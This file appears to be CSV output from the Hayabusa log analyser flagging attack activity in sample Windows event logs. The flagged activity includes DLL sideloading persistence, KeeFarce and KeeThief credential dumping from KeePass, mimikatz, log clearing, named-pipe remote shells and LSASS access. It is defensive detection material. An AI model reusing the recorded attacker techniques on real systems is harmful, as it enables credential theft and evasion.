2019-04-28 00:57:53.884 +09:00,IEWIN7,13,medium,Persis,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.931 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Roaming\NvSmart.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2992 | Src PGUID: 365ABB72-7C01-5CC4-0000-0010F9530C00 | Tgt PID: 3076 | Tgt PGUID: 365ABB72-7C01-5CC4-0000-00105C5C0C00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.931 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: cmd.exe /A | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe"" | LID: 0xf4be | PID: 3076 | PGUID: 365ABB72-7C01-5CC4-0000-00105C5C0C00 | Hash: SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:53.931 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:54.134 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: ""C:\Windows\System32\cmd.exe"" /c del /q ""C:\Users\IEUser\Downloads\Flash_update.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\Flash_update.exe"" | LID: 0xf4be | PID: 3188 | PGUID: 365ABB72-7C02-5CC4-0000-0010FD6E0C00 | Hash: SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 00:57:54.165 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Downloads\Flash_update.exe | PID: 2680 | PGUID: 365ABB72-7C01-5CC4-0000-00102B3E0C00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx
2019-04-28 03:47:00.046 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"technique_id=T1036,technique_name=Masquerading | Cmd: KeeFarce.exe | Process: C:\Users\Public\KeeFarce.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0xffa8 | PID: 1288 | PGUID: 365ABB72-A3A4-5CC4-0000-001084960C00 | Hash: SHA1=C622268A9305BA27C78ECB5FFCC1D43B019847B5,MD5=07D86CD24E11C1B8F0C2F2029F9D3466,SHA256=F0D5C8E6DF82A7B026F4F0412F8EDE11A053185675D965215B1FFBBC52326516,IMPHASH=D94F14D149DD5809F1B4D1C38A1B4E40",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx
2019-04-28 03:47:00.046 +09:00,IEWIN7,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx
2019-04-28 03:47:00.062 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"creddump - keefarce HKTL | Image: C:\Users\Public\BootstrapDLL.dll | Process: C:\Program Files\KeePass Password Safe 2\KeePass.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 2364 | PGUID: 365ABB72-A201-5CC4-0000-00104F500800 | Hash: SHA1=B1230EC24647B3A6A21C2168134917642AE0F44A,MD5=A7683D7DC8C31E7162816D109C98D090,SHA256=92DDE9160B7A26FACD379166898E0A149F7EAD4B9D040AC974C4AFE6B4BD09B5,IMPHASH=E70B5F29E0EFB3558160EFC6DD598747",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx
2019-04-28 03:47:00.062 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Users\Public\KeeFarce.exe | Tgt Process: C:\Program Files\KeePass Password Safe 2\KeePass.exe | Src PID: 1288 | Src PGUID: 365ABB72-A3A4-5CC4-0000-001084960C00 | Tgt PID: 2364 | Tgt PGUID: 365ABB72-A201-5CC4-0000-00104F500800,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx
2019-04-28 03:47:00.062 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"creddump - keefarce HKTL | Image: C:\Users\Public\BootstrapDLL.dll | Process: C:\Users\Public\KeeFarce.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1288 | PGUID: 365ABB72-A3A4-5CC4-0000-001084960C00 | Hash: SHA1=B1230EC24647B3A6A21C2168134917642AE0F44A,MD5=A7683D7DC8C31E7162816D109C98D090,SHA256=92DDE9160B7A26FACD379166898E0A149F7EAD4B9D040AC974C4AFE6B4BD09B5,IMPHASH=E70B5F29E0EFB3558160EFC6DD598747",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx
2019-04-28 03:47:00.124 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\Public\KeeFarce.exe | PID: 1288 | PGUID: 365ABB72-A3A4-5CC4-0000-001084960C00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx
2019-04-28 03:55:04.710 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Program Files\KeePass Password Safe 2\KeePass.exe | Src PID: 2856 | Src PGUID: 365ABB72-A512-5CC4-0000-0010C05E1B00 | Tgt PID: 2364 | Tgt PGUID: 365ABB72-A201-5CC4-0000-00104F500800,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
2019-04-28 03:55:04.710 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
2019-04-28 03:55:04.710 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
2019-04-28 03:55:04.980 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Program Files\KeePass Password Safe 2\KeePass.exe | Src PID: 2856 | Src PGUID: 365ABB72-A512-5CC4-0000-0010C05E1B00 | Tgt PID: 2364 | Tgt PGUID: 365ABB72-A201-5CC4-0000-00104F500800,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
2019-04-28 03:55:04.980 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
2019-04-28 03:55:04.980 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx
2019-04-28 04:27:55.274 +09:00,IEWIN7,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_chrome_firefox_opera_4663.evtx
2019-04-28 06:04:25.733 +09:00,DESKTOP-JR78RLP,104,high,Evas,System Log File Cleared,User: jwrig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx
2019-04-28 06:04:32.373 +09:00,DESKTOP-JR78RLP,7040,medium,Evas,Event Log Service Startup Type Changed To Disabled,Old Setting: auto start | New Setting: disabled,rules/hayabusa/default/alerts/System/7040_ImpairDefenses-DisableWindowsEventLogging_EventLogServiceStartupDisabled.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx
2019-04-29 01:29:42.988 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\Desktop\Win32\mimikatz.exe | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x800 | Src PID: 860 | Src PGUID: 365ABB72-D3C2-5CC5-0000-0010D9790500 | Tgt PID: 748 | Tgt PGUID: 365ABB72-D3E8-5CC5-0000-0010E7D30500,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx
2019-04-29 01:29:42.988 +09:00,IEWIN7,10,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx
2019-04-30 05:59:14.447 +09:00,IEWIN7,18,info,,Pipe Connected,\46a676ab7f179e511e30dd2dc41bd388 | Process: System | PID: 4 | PGUID: 365ABB72-D9C4-5CC7-0000-0010EA030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 05:59:14.447 +09:00,IEWIN7,18,critical,Evas | PrivEsc,Malicious Named Pipe,,rules/sigma/pipe_created/sysmon_mal_namedpipes.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 05:59:15.575 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:445 (IEWIN7) | Dst: 10.0.2.17:63025 (NLLT106876) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-D9C4-5CC7-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 05:59:21.539 +09:00,IEWIN7,10,low,,Process Access,Src Process:  | Tgt Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3940 | Src PGUID: 365ABB72-6231-5CC7-0000-00104CF71800 | Tgt PID: 3376 | Tgt PGUID: 365ABB72-65A9-5CC7-0000-00104E5C2400,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 05:59:21.539 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x10896 | PID: 3376 | PGUID: 365ABB72-65A9-5CC7-0000-00104E5C2400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 05:59:21.539 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 05:59:21.539 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 05:59:22.144 +09:00,IEWIN7,10,low,,Process Access,Src Process: io\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\whoami.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3376 | Src PGUID: 365ABB72-65A9-5CC7-0000-00104E5C2400 | Tgt PID: 2116 | Tgt PGUID: 365ABB72-65AA-5CC7-0000-00104D882400,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 05:59:22.144 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" /all | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile | LID: 0x10896 | PID: 2116 | PGUID: 365ABB72-65AA-5CC7-0000-00104D882400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 05:59:22.144 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 05:59:22.144 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 05:59:22.144 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 05:59:55.472 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x10896 | PID: 2244 | PGUID: 365ABB72-65CB-5CC7-0000-001002202600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx
2019-04-30 16:22:56.571 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Programs\Opera\launcher.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Temp\opera autoupdate\installer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3712 | Src PGUID: 365ABB72-F7D0-5CC7-0000-0010D0220E00 | Tgt PID: 2784 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010CB280E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:22:56.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Programs\Opera\launcher.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3712 | Src PGUID: 365ABB72-F7D0-5CC7-0000-0010D0220E00 | Tgt PID: 3624 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010DF2F0E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:22:57.149 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3624 | Src PGUID: 365ABB72-F7D0-5CC7-0000-0010DF2F0E00 | Tgt PID: 3504 | Tgt PGUID: 365ABB72-F7D1-5CC7-0000-0010AF380E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.883 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\smss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 264 | Tgt PGUID: 365ABB72-F69F-5CC7-0000-0010132B0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.883 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\csrss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 336 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-001033480000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wininit.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 384 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-0010A74B0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\csrss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 392 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-00103F4C0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 440 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-001043520000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 468 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-001004550000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-001072590000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\lsm.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 500 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-0010A3590000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 616 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-0010BB700000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\VBoxService.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 676 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-0010E7AC0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 740 | Tgt PGUID: 365ABB72-F6A1-5CC7-0000-00101AB00000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 804 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-00105FB40000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 872 | Tgt PGUID: 365ABB72-F6A2-5CC7-0000-001015C00000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx
